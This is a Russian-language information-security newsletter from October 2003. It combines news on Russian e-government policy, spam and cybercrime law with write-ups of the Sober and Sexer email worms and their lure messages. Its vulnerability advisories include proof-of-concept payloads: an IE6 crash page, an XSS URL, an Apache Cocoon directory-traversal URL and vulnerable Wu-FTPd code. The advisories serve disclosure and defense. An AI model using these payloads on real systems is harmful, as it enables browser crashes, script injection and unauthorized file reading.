Рассылка закрыта
При закрытии подписчики были переданы в рассылку "Информационная безопасность: новости, статьи, обзоры" на которую и рекомендуем вам подписаться.
Вы можете найти рассылки сходной тематики в Каталоге рассылок.
15 новостей по информационной безопасности каждый день
Информационный Канал Subscribe.Ru |
Россия: РИО-центр представит Национальную стратегию информразвития
27 октября | Рубрика: Информационные ресурсы023 октября состоялось расширенное заседание Правления и Попечительского совета Центра развития информационного общества). РИО-Центр – исследовательская организация, созданная по инициативе научной общественности при поддержке Минсвязи РФ для привлечения ведущих российских и мировых специалистов к разработке и анализу актуальных теоретических и практических проблем построения и развития информационного общества. В ходе заседания были представлены проект Национальной стратегии информационного развития и план-проспект Программы действий по развитию информационного общества в России.
Председателем правления РИО-Центр является министр Российской Федерации по связи и информатизации Леонид Рейман. По словам министра, в Национальной стратегии информационного развития анализируются основные черты и тенденции развивающегося во всем мире феномена информационного общества, определяются принципы и технологии движения России в направлении построения информационного общества, даны механизмы вхождения в глобальную информационно-коммуникационную среду в качестве полноправного участника.
В плане-проспекте Программы сформулированы предложения по реализации комплекса мер нормативно-правового, политического, административного, экономического, социального и технологического характера, которые в перспективе будут способствовать построению в России информационного общества. Полномасштабная разработка и последующая реализация положений Программы позволит обеспечить экономический и социальный прорыв страны, существенно поднять уровень общественного благосостояния, содействовать развитию демократических институтов и укреплению международного престижа России.
Предлагаемые комплексные мероприятия направлены на значительное повышение эффективности функционирования российской экономики за счет перехода от топливно-сырьевой доминанты к широкому использованию высоких технологий во всех сферах. В рамках реализации Программы предполагается придание ей общенационального статуса. Национальная стратегия информационного развития будет представлена Президенту до конца 2003 года.
"Sober" поет оду "Sobig"
27 октября | Рубрика: Проблемные ситуации, информационная преступность, сетевые войныНовый сетевой червь восхищается автором "Sobig" и маскируется под антивирус
"Лаборатория Касперского", ведущий российский разработчик систем защиты от вирусов, хакерских атак и спама, предупреждает о начале эпидемии сетевого червя "Sober". Данная вредоносная программа была обнаружена еще в субботу, однако сейчас наблюдается всплеск ее активности, что связано с началом рабочей недели.
"Sober" является классическим сетевым червем, распространяющимся по электронной почте. Зараженные письма могут содержать различные заголовки, тексты на английском и немецком языках, а также имена и расширения (PIF, BAT, SCR, COM, EXE) вложенных файлов, что значительно затрудняет его идентификацию по внешним признакам. Например:
Тема письма:
New Sobig-Worm variation (please read)
Текст письма:
New Sobig variation in the net.
You must change any
settings before the worm control your computer! But, read the official statement
from Norton Anti Virus!
Имя вложенного файла:
NAV.pif
Если пользователь имел неосторожность запустить вложенный в зараженное письмо файл, то "Sober" показывает на экране фальсифицированное сообщение об ошибке:
File not complete!
Затем червь создает в системном каталоге Windows три свои копии с различными именами и регистрирует их в ключе автозапуска системного реестра операционной системы. После этого "Sober" запускает процедуру распространения. Для этого он сначала находит на зараженном компьютере файлы, которые могут содержать электронные адреса (например, HTML, WAB, EML, PST и др.), считывает оттуда данные и, незаметно для владельца компьютера от его имени рассылает найденным адресатам свои копии.
Червь также содержит в своем теле текстовые строки, где автор "Sober" выражает свое восхищение автором другого сетевого червя, "Sobig".
Процедуры защиты от "Sober" уже добавлены в базу данных Антивируса
Касперского®. Более подробная информация о данной вредоносной программе доступна
в Вирусной
Энциклопедии Касперского.
Евросоюз создал свод правил по расследованию киберпреступлений
27 октября | Рубрика: Регулирование: Законы, постановления, сертификация, контрольЕвропейская комиссия выпустила свод правил о том, чем должны руководствоваться европейские полицейские при расследовании дел о взломе сайтов, онлайновом мошенничестве и создании компьютерных вирусов. По мнению создателей правил, теперь доказать в суде виновность кибер-преступника станет легче, поскольку наконец-то урегулирован порядок работы с доказательствами подобных преступлений - логами, электронной почтой, файлами и т.п.
Представленная методология разрабатывалась при непосредственном участии самых опытных кибер-ищеек Европы, в том числе из компаний Alcatel британского агентства кибербезопасности QinetiQ. Теперь, если все полицейские, занимающиеся расследованием дела о кибер-преступлении, будут следовать данным советам, все доказательства будут иметь легальную силу и помогут упрятать виновного за решетку. Правилами также предусмотрены действия руководства обычной компании в случае, если она пострадала от действий кибер-преступников.
2В Калифорнии власти выиграли первое дело против спама
27 октября | Рубрика: Проблемные ситуации, информационная преступность, сетевые войныПредставители властей американского штата Калифорния выиграли в пятницу первое "антиспамовое" дело: суд наложил штраф в $2 миллиона на маркетинговую фирму за рассылку миллионов электронных сообщений людям, в которых давались советы о том, как заниматься спамом.
Главный прокурор штата Билл Локьер возбудил дело против PW Marketing и ее хозяев Пола Уиллиса и Клаудии Гриффин в 2002 году в рамках антиспамового законодательства штата, принятого в 1998 году. Впоследствии этот закон был ужесточен.
PW Marketing, Пола Уиллис и Клаудия Гриффин были обвинены в рассылке миллионов электронных сообщений, в которых они давали советы по спаммингу, а также предоставляли длинный список электронных адресов. Суд, в частности, запретил компании рассылку подобных сообщений и получение доступа к компьютерам без разрешения их владельцев. По первоначальному законодательству от 1998 года запрещалась рассылка электронной рекламы тем, кто указал на то, что они не хотят получать подобную почту.
3Чем определяется защита
27 октября | Рубрика: Проблемные ситуации, информационная преступность, сетевые войныДолгие часы работы над кодом, блокированные серверы и ПК, настройка капризной системы обнаружения вторжений, попытки найти вирусы на машинах пользователей -- не начинает ли все это вас раздражать? Право слово, не стоит волноваться, ведь кое-кто работает еще напряженнее. Я имею в виду взломщиков.
Создание вирусов и других вредоносных программ всегда считалось уделом любителей-одиночек. Просиживая долгие часы за клавиатурами своих компьютеров, потенциальные преступники целыми днями напролет придумывали зловредные коды, чтобы доказать свое умение или излить злость на некоего далекого недруга.
Потом они выпускали код в мир, где тот творил свое черное дело -- нарушал работу компьютеров, удалял файлы, наводнял ненужным трафиком корпоративные сети. Но порой весь их труд пропадал втуне, результаты ночных бдений так и оставались незамеченными в хаосе Интернета.
Именно такова предыстория большинства вирусов и сетевых червей, с которыми мы сталкивались раньше. Но сейчас ситуация меняется. SoBig, Blaster, CodeRed и некоторые другие опасные разработки наглядно демонстрируют, что создание вирусов стало предприятием коллективным, хотя и неформальным.
Всем новым вирусам и червям свойственна одна общая черта: после начальной шумихи кто-то дорабатывает вредоносную программу, оттачивает ее и вновь выпускает в сетевой мир. И очень похоже, что этим занимается уже не автор вируса.
Исходные тексты "вредителей" публикуются на подпольных Web-сайтах, а иногда и в списках рассылки, посвященных общественной безопасности, поэтому взломщику не составляет труда их найти.
После этого он может на досуге ближе познакомиться с творением незнакомого "коллеги", внести в него изменения по своему вкусу и вновь выпустить червяка или вирус гулять по свету.
Последним и самым серьезным подтверждением сказанного может служить SoBig.F. Это уже шестая версия вируса. Во многом она похожа на своих предшественниц, но при этом способна заставлять зараженные машины подключаться к удаленному серверу и загружать с него новые версии.
Такая способность самообновляться заставила немало попотеть антивирусных экспертов, пользователей и агентов ФБР. Правда, отмечалась она и в некоторых прежних версиях вируса, но была далеко не столь развитой, как сейчас.
"Я сталкивался с этим и раньше, -- сказал стратег в области безопасности eTrust фирмы Computer Associates International (Исландия, шт. Нью-Йорк) Ян Хамерофф. -- Но сейчас, как мне кажется, должно тревожить другое: широкая распространенность нового вируса и большая вероятность повторения эпидемии".
SoBig.F дает команду инфицированной машине установить связь с одним из 20 IP-адресов, скрытых в коде самого вируса. В случае успеха компьютер скачивает и запускает неизвестный файл. Специалисты по безопасности опасаются, что это может быть либо троян, либо какая-то инструментальная программа для развертывания более широкой атаки.
К счастью, власти смогли выследить и закрыть большую часть из упомянутых 20 адресов, поэтому предполагаемая массированная атака так и не состоялась.
Функция самообновления впервые была отмечена в вирусе SoBig.C, однако до появления SoBig.F ни один из вирусов не нес в себе IP-адресов, с которыми должен связываться зараженный компьютер.
Некоторые эксперты уже высказывают мнение, что вирусы SoBig создаются, запускаются в сеть и совершенствуются некими профессионалами, преследующими далеко идущие цели и не ограничивающимися простым переполнением почтовых ящиков мусором.
Тот факт, что часть кода самообновления появилась еще в прежних версиях вируса, дает основания предполагать, что здесь используется метод проб и ошибок. Впрочем, с таким утверждением согласны не все члены антивирусного сообщества.
"Мы пока не находим никаких свидетельств того, что этот механизм предназначен для рассылки коммерческого спама, -- утверждает Крис Рэйт, технический консультант фирмы Sophos (Линнфильд, шт. Массачусетс), специализирующейся на борьбе с вирусами в корпоративных масштабах. -- Это воистину какой-то рок.
Вирусы возникают с невероятной скоростью, что очень уж смахивает на бета-тестирование".
Сага о червяке по имени Blaster развивалась по такому же сценарию, но в гораздо более сжатые сроки. Исходный его вариант поразил Интернет 11 августа и вскоре начал стремительно размножаться в Сети. А через неделю или около того было обнаружено уже две вариации этого червяка.
Одна из них, проникнув в персональные компьютеры, пыталась загрузить и установить заплату, которая открывала брешь для дальнейшего поражения.
Второй вариант червяка, известный под именем Blaster.B или Teekid, мало отличался от первоначального, однако его автор пытался взять под свой контроль ранее скомпрометированные машины.
Но даже в такой ситуации Хамерофф из Computer Associates способности взломщиков преувеличивать не склонен. "Я нисколько не сомневаюсь, что среди любителей вирусов сложилось нечто вроде сообщества открытых кодов, -- говорит он. -- У них налажен обмен информацией, здесь принято хвастаться и демонстрировать свои, если так можно выразиться, успехи.
Но я не думаю, что речь может идти о скоординированной работе. Все здесь намного проще: пока мы совершенствуем мышеловки, они выводят новые породы мышей".
4Rainbow Technologies и SafeNet – новое слияние на рынке безопасности
27 октября | Рубрика: Технологии безопасности. Организации разработчики, интеграторы.Американские разработчики решений по безопасности сетей Rainbow Technologies и SafeNet объявили о слиянии. Основная цель слияния – предоставить крупным финансовым и государственным компаниям комплексные решения, обеспечивающие более широкие возможности, чем совместная работа отдельно взятых продуктов. Речь идёт о продуктах по защите информации и инструментах аутентификации Rainbow, внедренных в SafeEnterprise Security System. Когда завершится сделка по слиянию, капитализация вновь созданной компании возрастёт до $1 млрд.
5Программа действий по развитию информационного общества в России будет представлена на совете по науке и технологии при президенте РФ к концу текущего года
27 октября | Рубрика: Регулирование: Законы, постановления, сертификация, контрольЦентр развития информационного общества (РИО-Центр) планирует до конца 2003 г. разработать и представить на рассмотрение совета по науке и технологии при Президенте РФ программу действий по развитию информационного общества в России. Об этом сообщил президент центра Василий Липицкий на заседании правления и попечительского совета центра.
По его словам, программа разрабатывается при поддержке Министерства РФ по связи и информатизации, в ней сформулированы предложения по реализации комплекса мер нормативно-правового, политического, административного, экономического, социального и технологического характера, которые обеспечат эффективное движение России в направлении построения информационного общества. Эта программа разрабатывает условия для развития информатизации России ускоренными темпами и в связи с этим она является технологической базой для реализации федеральной целевой программы "Электронная Россия". Планом действий по реализации программы предполагается придание ей общенационального статуса, что обеспечит возможность координации усилий всех участников процесса информатизации, общества и государства, – подчеркнул В. Липицкий. Предполагается, что данный документ будет иметь общегосударственный статус, – сказал В. Липицкий. Также РИО-Центр в настоящее время разрабатывает национальную стратегию информационного развития, в которой анализируются основные черты и тенденции развивающегося во всем мире информационного общества, выявляются принципы и технологии движения России в направлении построения информационного общества.
Министр РФ по связи и информатизации Леонид Рейман, присутствовавший на заседании, отметил важность документа. "С помощью решения поставленных в нем задач мы сможем решить ряд проблем, в частности обеспечить подъем общенационального достояния России, сократить технологическое отставание от других стран", – сказал министр.
Центр развития информационного общества создан при поддержке Минсвязи РФ. Председателем правления РИО-Центра является министр РФ по связи и информатизации Л. Рейман. Руководит попечительским советом центра вице-президент Российской академии наук Александр Некипелов.
6В Чувашии создан удостоверяющий центр по использованию электронной цифровой подписи
27 октября | Рубрика: Технологии безопасности. Организации разработчики, интеграторы.Правительство Чувашии создало удостоверяющий центр, который позволит органам исполнительной власти вести всю переписку по электронной почте с использованием электронной цифровой подписи (ЭЦП).
Как сообщают в Госкомсвязьинформе Чувашии, это первый региональный удостоверяющий центр, создаваемый в рамках федеральной целевой программы "Электронная Россия". В Чувашии уже более полутора лет все финансовые документы в системе республиканского казначейства пересылались "под защитой" электронной подписи. Теперь масштабы использования ЭЦП многократно возрастают: ею будут оснащены все республиканские и муниципальные органы власти, бюджетные учреждения, органы ЗАГС и МВД, крупные предприятия. 24 октября 2003 г. были проведены занятия по использованию электронной цифровой подписи с ответственными сотрудниками республиканских и муниципальных органов власти. В ходе занятий им были вручены ключи электронной подписи, с использованием которых до конца октября ЭЦП будет внедрена в практическую деятельность органов власти. На очереди – внедрение электронной подписи в бюджетных организациях и на крупных предприятиях. Ожидается, что до конца 2003 г. будет проведена опытная эксплуатация безбумажного предоставления налоговой и статистической отчетности.
75 ноября Минсвязи России завершит прием заявок на творческий конкурс среди органов госвласти в рамках ФЦП "Электронная Россия".
27 октября | Рубрика: События, семинары, конференции, даты5 ноября Министерство РФ по связи и информатизации завершит прием заявок на творческий конкурс среди органов государственной власти субъектов РФ и органов местного самоуправления по созданию информационных систем поддержки принятия управленческих решений в рамках федеральной целевой программы (ФЦП) "Электронная Россия".
По словам министра РФ по связи и информатизации Леонида Реймана, участие в этом конкурсе даст возможность регионам, в случае победы, получить на реализацию проекта дополнительное финансирование из федерального бюджета. Кроме того, отметил министр, решения, представленные и победившие на конкурсе, в дальнейшем могут быть использованы при создании подобных информационных систем для органов государственной власти в других регионах России.
Творческий конкурс по созданию информационных систем поддержки принятия управленческих решений в рамках ФЦП "Электронная Россия" среди органов государственной власти субъектов РФ и органов местного самоуправления был объявлен в начале сентября текущего года.
8Спам снижает популярность e-mail
27 октября | Рубрика: Проблемные ситуации, информационная преступность, сетевые войныКак показало недавнее исследование американской компании Pew Internet, потоки спама, переполняющие почтовые ящики, начинают отбивать у пользователей охоту обращаться к электронной почте: четверть опрошенных призналась, что меньше используют e-mail, не желая сталкиваться с засильем электронного «мусора».
По оценкам Pew Internet, спам составляет более половины всех сообщений электронной почты. Если год назад нежелательные рассылки составляли лишь 2,3% всех сообщений, то в мае 2003 года этот показатель достиг 55%. Как показал проведенный в июне этого года опрос 1380 пользователей интернета, возросшее за последний год количество спамерских сообщений снижает популярность электронной почты. Некоторая часть респондентов признались, что сократили ее использование, около половины же опрошенных заявили о том, что меньше стали доверять интернету в целом, учитывая откровенно недостоверный характер рассылаемых спамерами писем. Как оказалось, нежелательные рассылки влияют и на отношение пользователей к Сети в целом: более двух третей респондентов заявили о том, что пребывание в онлайне вызывало у них негативные эмоции или раздражение из-за спама.
Однако, как отметили исследователи, существуют признаки того, что спам срабатывает – количество американцев, откликающихся на предложения спамеров, вполне достаточно для того, чтобы окупить стоимость самих многотысячных рассылок. Треть опрошенных заявили, что кликали на указанной в спамерском письме ссылке, чтобы узнать о предложении побольше. 7% респондентов воспользовались предложениями спамеров – заказали товар или услугу.
Больше всего пользователей электронной почты – родителей вообще и женщин в частности – беспокоят сообщения порнографического характера, проникновение которых в почтовые ящики нельзя никоим образом контролировать. Как показал опрос, самой распространенной мерой борьбы со спамом до сих пор остается клавиша Delete – лишь меньшая часть респондентов использует фильтры для выявления спама.
Что касается России, то и здесь, по оценкам экспертов, спам вышел на «общемировые» показатели и составляет, по данным провайдеров, больше 25%, а по оценке интернет-компаний – порядка 50% общего трафика электронной почты. Учитывая, что, по некоторым данным, на просмотр и стирание спама уходит до 12 минут рабочего времени сотрудника в день, в год на это уходит до 40 часов, или стандартная рабочая неделя.
Все основные игроки Рунета подчеркивают необходимость законодательно бороться со спамом. Это касается, в первую очередь, законодательства о рекламе – запрета на рассылку рекламных сообщений путем спама, а также кодекса об административных правонарушениях, подразумевающего административную ответственность за подобные действия. Однако, по оценкам компании «Ашманов и Партнеры», на принятие соответствующих законов уйдет, как минимум, полгода, на применение законов – еще год, на создание легальных альтернатив спаму – 1-2 года, а пропаганда неэтичности спама займет 2-3 года.
Пока же у российских спамеров перспективы довольно радужные: по прогнозам «Ашманова и Партнеров», в ближайшие два года объем спама, как минимум, удвоится. По оценкам компании, в России рассылается примерно 15-30 млн. спамерских сообщений в день, и это самая консервативная оценка (для сравнения – в мире этот показатель достигает 5-10 млрд. нежелательных писем в день). Пик спама в Рунете «Ашманов и Партнеры» прогнозируют на 2004 год, далее же должно произойти снижение его доли – за счет повсеместной установки фильтров и законодательной борьбы.
9Киберпреступников посадят под «колпак»
27 октября | Рубрика: Регулирование: Законы, постановления, сертификация, контрольСовременное развитие информационных технологий и вхождение Украины в
международное информационное пространство требуют адекватного правового
регулирования и обеспечения защиты интересов граждан, общества и государства в
информационной сфере. Особую актуальность эта проблема приобретает с учетом
роста киберпреступности и использования информационных технологий
террористическими группировками. Мониторинг телекоммуникаций, осуществляемый на
законных основаниях, - это требование времени.
Информационно-аналитическая служба Госкомсвязи Украины сообщает, что
Комитет по вопросам борьбы с организованной преступностью и коррупцией
рекомендовал Верховной Раде Украины рассмотреть в первом чтении и принять за
основу проект закона о мониторинге телекоммуникаций, внесенном Кабинетом
Министров.
Законопроектом предусматривается создание системы контроля и
осуществления мониторинга телекоммуникаций соответствующими подразделениями для
проведения оперативно-сыскной деятельности в телекоммуникационных сетях.
По мнению разработчиков проекта, он должен содействовать
правоохранительным органам в сотрудничестве с операторами связи при
расследовании и противодействии киберпреступлениям.
Необходимость
разработки законопроекта вызвана отсутствием законов, которые дали бы
возможность правоохранительным органам в сотрудничестве с операторами сетей
телекоммуникаций создавать и использовать эффективные технологии в процессе
осуществления оперативно-сыскной деятельности на каналах сетей телекоммуникаций,
и, тем самым, адекватно противодействовать преступлениям, которые планируются и
осуществляются с использованием современных технологий.
Члены Комитета
поддержали законопроект, направленный на предупреждение и раскрытие
преступлений, ответственность за которые предусмотрена Уголовным кодексом
Украины.
10
Кибермошенники уходят в оффшоры
27 октября | Рубрика: Проблемные ситуации, информационная преступность, сетевые войныКриминальное использование современных информационных технологий делает
компьютерную преступность делом очень прибыльным.
Результаты ежегодного
исследования компании Verisign показали, что около 6,2 процента коммерческих
транзакций являются попытками мошенничества, при этом примерно половина из них
приходятся на США, а вторая половина - на весь остальной мир. Анализ источников
атак показал высокую степень корреляции (47%) между источником мошеннических
действий и атаками на системы безопасности. Это говорит о том, что хакеры,
пытающиеся получить контроль над интернет-серверами - это те же люди, что и
мошенники, подделывающие коммерческие транзакции.
Количество
DNS-запросов за этот период увеличилось на 51,4%. количество DNS-запросов,
связанных с электронными письмами, выросло за тот же период на 245 процентов.
Это связано с увеличившимся количеством спама, использующего графические
иллюстрации, а также с распространением почтовых вирусов, самостоятельно
обращающихся к почтовым серверам.
Общее число инцидентов, связанных с
безопасностью, увеличилось на 99% в расчете на один атакуемый компьютер. При
этом вероятность того, что источник опасности расположен в США, составляет 81
процент. Мошенники предпочитают заниматься своим черным делом в других странах,
пользуясь отсутствием соответствующих международных законов или низким уровнем
государственного контроля.
11
И снова "Sexer"
27 октября | Рубрика: Проблемные ситуации, информационная преступность, сетевые войны"Лаборатория Касперского", ведущий российский разработчик систем защиты от вирусов, хакерских атак и спама, предупреждает о регистрации массовой рассылки новой, четвертой версии сетевого червя "Sexer" - "Sexer.d".
Новая версия "Sexer" отличается от своих предшественников лишь несколькими незначительными изменениями. В частности, червь рассылается по электронной почте под видом сообщений от службы технической поддержки Microsoft. Сами письма выглядят следующим образом:
Адрес отправителя:
support@microsoft.com
Тема письма:
The latest update for your Windows Media Player
Текст письма: Enjoy fast and flexible music and video playback with
Microsoft Windows Media Player 9 Series.
Over 120 new features, including
Fast Streaming, quicker startup, and smart jukebox features make this the best
Player yet.
Имя вложенного файла:
WMPUpdate.exe
При запуске вложенного файла "Sexer" запускает процедуру заражения компьютера. Для этого он копирует себя в директорию "Program Files\Common Files\System" под именем "WMPUpdate.exe" и регистрирует этот файл в ключе автозапуска системного реестра Windows. Подобно более ранним версиям червь также создает на диске файл "WMPUpdate.bmp" и устанавливает его как фон рабочего стола Windows. Данный файл содержит текст, аналогичный использованному в "Sexer.a".
Защита от данной вредоносной программы уже добавлена в базу данных Антивируса Касперского®.
Более подробное описание интернет-червя "Sexer" доступно в Вирусной Энциклопедии
Касперского.
Доступ к шифрованному PGP диску другого пользователя в Windows XP
27 октября | Рубрика: Дыры и патчи программ и операционных средПрограмма: PGPDisk 6.0.2 i
Опасность: Низкая
Наличие эксплоита: Не требуется
Описание: Уязвимость раскрытия информации обнаружена в PGPDisk. Локальный пользователь может получить неавторизованный доступ к PGP диску другого пользователя.
Когда пользователь использует функцию 'switch user' в Windows XP, то другой локальный пользователь может получить доступ к подключенному PGP диску.
URL производителя:http://www.pgpi.org/products/pgpdisk/
Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.
13DoS против Microsoft Internet Explorer
27 октября | Рубрика: Дыры и патчи программ и операционных сред
Программа: Microsoft Internet Explorer 6.0 – 6.0sp1 Опасность: Низкая Наличие эксплоита: Да Описание: Уязвимость обнаружена в Microsoft Internet Explorer. Удаленный атакующий может вызвать отказ в обслуживании. Проблема связанна с некорректной обработкой scrollbar-base-color атрибута div объекта. В результате удаленный атакующий может создать Web страницу, содержащую произвольный код сценария, чтобы аварийно завершить работу браузера пользователя, пытающего просмотреть эту Web страницу.
Пример/Эксплоит: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>CRASH-IE</title> <style type="text/css"> html, body { overflow-y: hidden; scrollbar-base-color: '#330066'; } .crash { position:absolute; left:200px; top:200px; width:200px; } </style> <script type="text/javascript"> function galgenfrist() { window.setTimeout('crashIE();',1000); } function crashIE() { var moveNode = document.getElementById("move"); if(moveNode) { moveNode.style.top = "100px"; moveNode.style.left = "200px"; } } </script> </head> <body onload="galgenfrist();"> <h1>CRASH-IE</h1> <div id="move" class="crash"> <table> <tbody> <tr> <td> <textarea></textarea> </td> </tr> </tbody> </table> </div> </body> </html> URL производителя:http://www.microsoft.com Решение: Способов устранения обнаруженной уязвимости не существует в настоящее время. |
Межсайтовый скриптинг в CensorNet proxy
27 октября | Рубрика: Дыры и патчи программ и операционных сред
Программа: CensorNet 3.х Опасность: низкая Наличие эксплоита: Да Описание: Уязвимость в проверке правильности входных данных обнаружена в CensorNet proxy. Удаленный пользователь может выполнить XSS нападение. Сценарий "dansguardian.pl" не фильтрует данные, представленные пользователем в "DENIEDURL" параметре. Пример/Эксплоит: http://SERVER/cgi-bin/dansguardian.pl?DENIEDURL=</a> <script>alert('Hi');window.open("http://www.SecurityLab.ru")</script> URL производителя: http://www.intrago.co.uk/products/censornet.php Решение: Способов устранения обнаруженной уязвимости не существует в настоящее время. Фильтруйте опасные символы в HTTP прокси. |
Множественные уязвимости в Scanner Access Now Easy (SANE)
27 октября | Рубрика: Дыры и патчи программ и операционных сред
Программа: Scanner Access Now Easy (SANE) 1.0.7 и более ранние версии Опасность: Низкая Наличие эксплоита: Да Описание: Несколько уязвимостей обнаружены в Scanner Access Now Easy (SANE). Удаленный пользователь может вызвать условия отказа в обслуживании. Уязвимы системы с запущенным 'saned' демоном. Удаленный пользователь может заставить saned использовать чрезмерно большое количество системной памяти или аварийно завершить работу демона. Уязвимость может эксплуатироваться, даже если хост удаленного пользователя не прописан в 'saned.conf' файле. Saned не в состоянии проверить IP адрес удаленного хоста для SANE_NET_INIT RPC сообщения (первое сообщение SANE сессии) (CVE: CAN-2003-0773). Программ не проверяет ошибки подключения. Удаленный пользователь может обрывать подключения, которые продолжит обрабатывать целевая система. В результате произойдет переполнение буфера и ошибка сегментации. (CVE: CAN-2003-0774). Удаленный пользователь может пользователь может подключится и оборвать подключение перед посылкой размера сток. В результате целевая система выделит чрезмерное количество системной памяти (CVE: CAN-2003-0775) Saned демон не в состоянии проверить целостность RPC числа, представленного пользователем (CVE: CAN-2003-0776). Если удаленный пользователь обрывает подключение к целевому серверу, в котором включены отладочные сообщения, то целевой сервер может распечатать non-null-terminated строку и аварийно завершить работу(CVE: CAN-2003-0777). Удаленный пользователь может выделить чрезмерно большое количество памяти на целевом сервере. (CVE: CAN-2003-0778). URL производителя: http://www.sane-project.org Решение: Установите обновленную версию программы (1.0.9) |
Другие публикации: |
Множественные уязвимости в HP Insight Manager
27 октября | Рубрика: Дыры и патчи программ и операционных сред
Программа: Insight Management for Clients versions 3.5 to 5.0; Remote Diagnostics Enabling Agent (all versions); Insight Manager LC versions 1.00 to 1.60 Опасность: Высокая Наличие эксплоита: Нет Описание: Уязвимость обнаружена в во встоенном Web сервере в Insight Management Agent, включая Insight Manager LC, Remote Diagnostics Enabling Agen, и Insight Management for Clients. Удаленный пользователь может получить доступ к системе или вызвать отказ в обслуживании. Не SSL компонента HP management web агента содержит недостаток, который позволяет удаленному пользователю получить доступ к системе или локальному пользователю получить поднятые привилегии на системе. Дополнительные подробности не раскрываются. URL производителя: http://www.hp.com/ Решение: Ограничьте доступ к Web интерфейсу только доверенным адресам. Отключите работу Web агента, согласно инструкции в источнике сообщения. |
Другие публикации: |
Доступ к произвольным файлам на системе в Apache Cocoon
27 октября | Рубрика: Дыры и патчи программ и операционных сред
Программа: Apache Cocoon version 2.1 before 22 Oct 2003 12:00,Apache Cocoon version 2.2 (Development) before 22 Oct 2003 12:00 Опасность: Низкая Наличие эксплоита: Да Описание: Уязвимость обнаружена в Apache Cocoon. Злонамеренный пользователь может получить доступ к чувствительной информации. Типовой сценарий "view-source" не проверяет правильность параметра "filename". В результате удаленный пользователь может выполнить нападения обхода каталога, чтобы получить доступ к произвольным файлам на системе. Пример/Эксплоит: http://[target]:8888/samples/view-source?filename=./././boot .ini URL производителя: http://nagoya.apache.org/bugzilla/show_bug.cgi?id=23949 Решение: Обновленная версия для 2.1 и 2.2 доступна через CVS: http://cocoon.apache.org/mirror.cgi |
Удаленное переполнение буфера в Washington University FTP daemon (Wu-FTPd)
27 октября | Рубрика: Дыры и патчи программ и операционных сред
Программа: Wu-FTPd version 2.6.2 (с поддержкой SKEY) Опасность: Высокая Наличие эксплоита: Да Описание: Переполнение буфера обнаружено в Washington University FTP daemon (Wu-FTPd). Удаленный атакующий может выполнить произвольный код на уязвимом сервере с root привилегии. Переполнение стекового буфера обнаружено в коде, который обрабатывает SKEY идентификацию в Wu-FTPd сервере. Представляя специально обработанные опознавательные мандаты, удаленный атакующий может аварийно завершить работу демона или выполнить произвольный код с root привилегиями. Переполнение расположено в функции skey_challenge() в src/ftpd.c файле: char *skey_challenge(char *name, struct passwd *pwd, int pwok) $ { $ static char buf[128]; ... if (pwd == NULL || skeychallenge(&skey, pwd->pw_name, sbuf)) $ sprintf(buf, "Password required for %s.", name); else sprintf(buf, "%s %s for %s.", sbuf, pwok ? "allowed" : "required", name); return (buf); }в коде не проверяются размеры параметра *name. Уязвимы системы, поддерживающие SKEY идентификацию. URL производителя:http://www.wuftpd.org/ Решение: Отключите поддержку SKEY или примените следующий патч: % diff -u ftpd.c fixed-ftpd.c --- ftpd.c 2001-11-29 17:56:11.000000000 +0100 +++ fixed-ftpd.c 2003-10-20 20:43:58.000000000 +0200 @@ -1662,9 +1662,9 @@ /* Display s/key challenge where appropriate. */ if (pwd == NULL || skeychallenge(&skey, pwd->pw_name, sbuf)) - sprintf(buf, "Password required for %s.", name); + snprintf(buf, 128-1, "Password required for %s.", name); else - sprintf(buf, "%s %s for %s.", sbuf, + snprintf(buf, 128-1, "%s %s for %s.", sbuf, pwok ? "allowed" : "required", name); return (buf); } % |
Отказ в обслуживании в Nokia IPSO appliances в кластерной конфигурации
27 октября | Рубрика: Дыры и патчи программ и операционных сред
Программа: Nokia IPSO 3.7 Опасность: Низкая Наличие эксплоита: Да Описание: Уязвимость обнаружена в Nokia IPSO в кластерной конфигурации. Удаленный пользователь может вызвать условия отказа в обслуживании. Сообщается, что Nokia IP-series appliances, работающие Iна IPSO 3.7 и конфигурированы как IP Clusters, уязвимы к нападению отказа в обслуживании. Дополнительные подробности не раскрываются. URL производителя: http://www.nokia.com/ Решение: Установите обновленную версию программы (IPSO (3.7 Build 29): https://support.nokia.com/security_platforms/index.jsp |
Эти и другие новости читайте на сайте Стра.тег
http://subscribe.ru/
E-mail: ask@subscribe.ru |
Отписаться
Убрать рекламу |
В избранное | ||